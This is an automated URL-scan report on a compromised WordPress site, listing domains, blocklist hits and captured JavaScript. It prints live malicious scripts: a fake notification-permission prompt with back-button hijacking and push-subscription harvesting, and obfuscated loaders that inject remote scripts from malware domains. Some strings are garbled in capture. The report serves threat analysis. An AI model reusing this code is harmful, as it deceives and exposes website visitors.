Overview

URLprofitcrow.com/
IP 162.213.255.22 (United States)
ASN#22612 NAMECHEAP-NET
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-11-25 22:08:13 UTC
StatusLoading report..
IDS alerts0
Blocklist alert31
urlquery alerts No alerts detected
Tags None

Domain Summary (28)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
ocsp.digicert.com (3) 86 No data No data 93.184.220.29
push.services.mozilla.com (1) 2140 No data No data 54.202.70.174
firefox.settings.services.mozilla.com (2) 867 No data No data 34.102.187.140
img-getpocket.cdn.mozilla.net (6) 1631 No data No data 34.120.237.76
freeserv.dukascopy.com (5) 794995 No data No data 194.8.15.120
code.jquery.com (1) 634 No data No data 69.16.175.42
ocsp.sca1b.amazontrust.com (1) 1015 No data No data 143.204.42.156
blueskymotions.net (1) 0 No data No data 185.177.94.108 Unknown ranking
api.stockdio.com (1) 324796 No data No data 34.232.23.18
new.weatherplllatform.com (1) 0 No data No data 91.211.91.114 Unknown ranking
r3.o.lencr.org (10) 344 No data No data 23.36.76.249
contile.services.mozilla.com (1) 1114 No data No data 34.117.237.239
simple.cofounderspecials.com (1) 0 No data No data 91.211.91.114 Unknown ranking
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
ocsp.sectigo.com (1) 487 No data No data 104.18.32.68
fonts.gstatic.com (1) 0 No data No data 216.58.207.195 Domain (gstatic.com) ranked at: 540
dn9.biz (3) 0 No data No data 195.154.50.108 Unknown ranking
dn9.biz (3) 0 No data No data 62.210.10.215 Unknown ranking
profitcrow.com (61) 0 No data No data 162.213.255.22 Unknown ranking
scripts.bettershitecolumn.com (1) 0 No data No data 91.211.91.104 Unknown ranking
ocsp.pki.goog (3) 175 No data No data 142.250.74.3
away.cdnbestplatform.com (1) 0 No data No data 91.211.91.104 Unknown ranking
freeserv-static.dukascopy.com (4) 0 No data No data 104.22.7.183 Domain (dukascopy.com) ranked at: 261069
cdnjs.cloudflare.com (4) 235 No data No data 104.17.25.14
fonts.googleapis.com (1) 8877 No data No data 142.250.74.10
trick.cofounderspecials.com (2) 0 No data No data 91.211.91.112 Unknown ranking
zerossl.ocsp.sectigo.com (3) 4049 No data No data 104.18.32.68
0.blueskymotions.net (2) 0 No data No data 185.177.94.108 Unknown ranking

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-25 2 profitcrow.com/ Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/jquery.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/jquery-migrate.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/video-popup/js/YouTubePopUp.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stock-market-ticker/assets/stockdio-wp.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stockdio-historical-chart/assets/stockdio (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/profitcrow/pagination.js Phishing
2022-11-25 2 trick.cofounderspecials.com/track.js?v=9.999 Malware
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/wp-mediaelement.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/dist/vendor/wp-polyfill.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/contact-form-7/includes/js/index.js Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stripe-payments/public/assets/js/stripe-h (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/renderers/vimeo.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/ui/core.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/frontend.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/header-footer-elementor/inc/js/frontend.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints. (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js Phishing
2022-11-25 2 trick.cofounderspecials.com/track.js?v=9.999 Malware
2022-11-25 2 away.cdnbestplatform.com/go.php?id=9677-22-5680954-11 Malware
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfont (...) Phishing
2022-11-25 2 scripts.bettershitecolumn.com/sort.js?v=100 Malware
2022-11-25 2 new.weatherplllatform.com/stick.js?v=7.77.7 Malware
2022-11-25 2 profitcrow.com/ Phishing

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 162.213.255.22
Date UQ / IDS / BL URL IP
2023-01-04 11:04:21 +0000 0 - 0 - 2 alliedfelicity.com/business-banking-notice-de (...) 162.213.255.22
2023-01-04 11:03:33 +0000 0 - 0 - 2 alliedfelicity.com/account.zip 162.213.255.22
2023-01-01 06:31:57 +0000 0 - 0 - 2 alliedfelicity.com/business-banking-notice-de (...) 162.213.255.22
2023-01-01 06:31:18 +0000 0 - 0 - 2 alliedfelicity.com/account.zip 162.213.255.22
2022-11-25 22:08:13 +0000 0 - 0 - 31 profitcrow.com/ 162.213.255.22


Last 5 reports on ASN: NAMECHEAP-NET
Date UQ / IDS / BL URL IP
2023-01-28 10:53:02 +0000 0 - 0 - 4 cienciano.com/race.exe 162.213.255.18
2023-01-28 10:48:04 +0000 0 - 0 - 8 expertstraders.com/installlingfile_x64_32bit.zip 192.64.117.220
2023-01-28 10:40:59 +0000 0 - 0 - 1 houzzing.com/Secure.00/Inn/loginweb.php?sslmo (...) 198.54.114.248
2023-01-28 10:24:19 +0000 0 - 0 - 2 delivery.bdsellprice.com/public/VlScjR5UDOwG6 (...) 68.65.120.179
2023-01-28 10:14:17 +0000 0 - 0 - 2 delivery.bdsellprice.com/public/XoWY6Q5B8nAMz (...) 68.65.120.179


Last 1 reports on domain: profitcrow.com
Date UQ / IDS / BL URL IP
2022-11-25 22:08:13 +0000 0 - 0 - 31 profitcrow.com/ 162.213.255.22


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-01-28 10:13:38 +0000 0 - 0 - 3 denimfocus.net/mailster/7644/d7d717e54cd323c1 (...) 68.65.120.78
2023-01-28 10:06:59 +0000 0 - 0 - 3 primaflor-sby.com/wp-content/ngg/modules/phot (...) 103.5.51.228
2023-01-28 09:24:42 +0000 0 - 2 - 10 ufj-ja.post778.top/jp.php 155.94.170.149
2023-01-28 08:33:33 +0000 0 - 0 - 4 pablobreijo.es/agenzia/e912/by3g6c.php 172.67.209.149
2023-01-28 07:25:11 +0000 0 - 2 - 2 194.190.153.137/gate.php?hwid=Q9IATRKPRH-kEec (...) 194.190.153.137

JavaScript

Executed Scripts (57)

Executed Evals (7)
#1 JavaScript::Eval (size: 7852) - SHA256: 01805edf950265b74eea23c1f16caf3adcb9debd694228f9a8131c373e3130b4
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=ede59595-4aac-48f8-ba4c-16b1da54c3a0&d=meygky3cmm5gi3bpg42tmmy&land=23',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='/?auf=gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/w76899721.js').then(()=>{if(Notification.permission==='granted'){window.location.href='/?auf=gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#2 JavaScript::Eval (size: 727) - SHA256: faca0b8a53bf2af83db28e2885d8c067ac3ae1e6d24d8c68f90b81aa21acaa84
																																																		  var scripts = document.getElementsByTagName("script");
																																																		  var wantme = false;
																																																		  for (var i = 0; i < scripts.length; i++) {
																																																		      if (scripts[i].id) {
																																																		          if (scripts[i].id == "trackmyposs") {
																																																		              wantme = true;
																																																		          }
																																																		      }
																																																		  }
																																																		  if (wantme == false) {
																																																		      var d = document;
																																																		      var s = d.createElement('script');
																																																		      s.id = "trackmyposs";
																																																		      s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 99, 114, 105, 112, 116, 115, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 111, 114, 116, 46, 106, 115, 63, 118, 61, 49, 48, 48);
																																																		      if (document.currentScript) {
																																																		          document.currentScript.parentNode.insertBefore(s, document.currentScript);
																																																		      } else {
																																																		          d.getElementsByTagName('head')[0].appendChild(s);
																																																		      }
																																																		  }
#3 JavaScript::Eval (size: 7918) - SHA256: 1ca29c4edebdadf8fdce0eb1318ac0194c97aa21f34fdefbe8c5e64f8bb3864a
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace(' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('
            BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG - xOq6GiK31R - NF--qzgT3_C2jurmRX_N6nY4g ');var denied=function(){window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('
            p256dh '):'
            ';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'
            ';let rawAuthSecret=fff.getKey?fff.getKey('
            auth '):'
            ';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'
            ';return fetch(' / ? send = ede59595 - 4 aac - 48 f8 - ba4c - 16 b1da54c3a0 & d = meygky3cmm5gi3bpg42tmmy & land = 22 ',{method:'
            POST ',mode:'
            no - cors ',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='
            granted '){CCC()}else{denied()}})};if('
            serviceWorker 'in navigator){workerInstaller=navigator.serviceWorker.register(' / w76899721.js ').then(()=>{if(Notification.permission==='
            granted '){window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}else if(Notification.permission!=='
            denied '){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#4 JavaScript::Eval (size: 663) - SHA256: dc6acc70fa6a127bcde95478f41fc3ec8b472cc6327b69d1fd5c5e3633a96540
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        if (psdd[i].id == "slectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "slectrepoint";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 110, 101, 119, 46, 119, 101, 97, 116, 104, 101, 114, 112, 108, 108, 108, 97, 116, 102, 111, 114, 109, 46, 99, 111, 109, 47, 115, 116, 105, 99, 107, 46, 106, 115, 63, 118, 61, 55, 46, 55, 55, 46, 55);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#5 JavaScript::Eval (size: 655) - SHA256: 8532e915d2cfe6d3a9804fa0b3a9eff8e366c2bed9011fbae4eee332ce7a6248
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        if (psdd[i].id == "spectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "spectrepoint";
    s.async = true;
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 97, 100, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 106, 108, 97, 115, 104, 46, 106, 115);
    if (document.currentScript) {
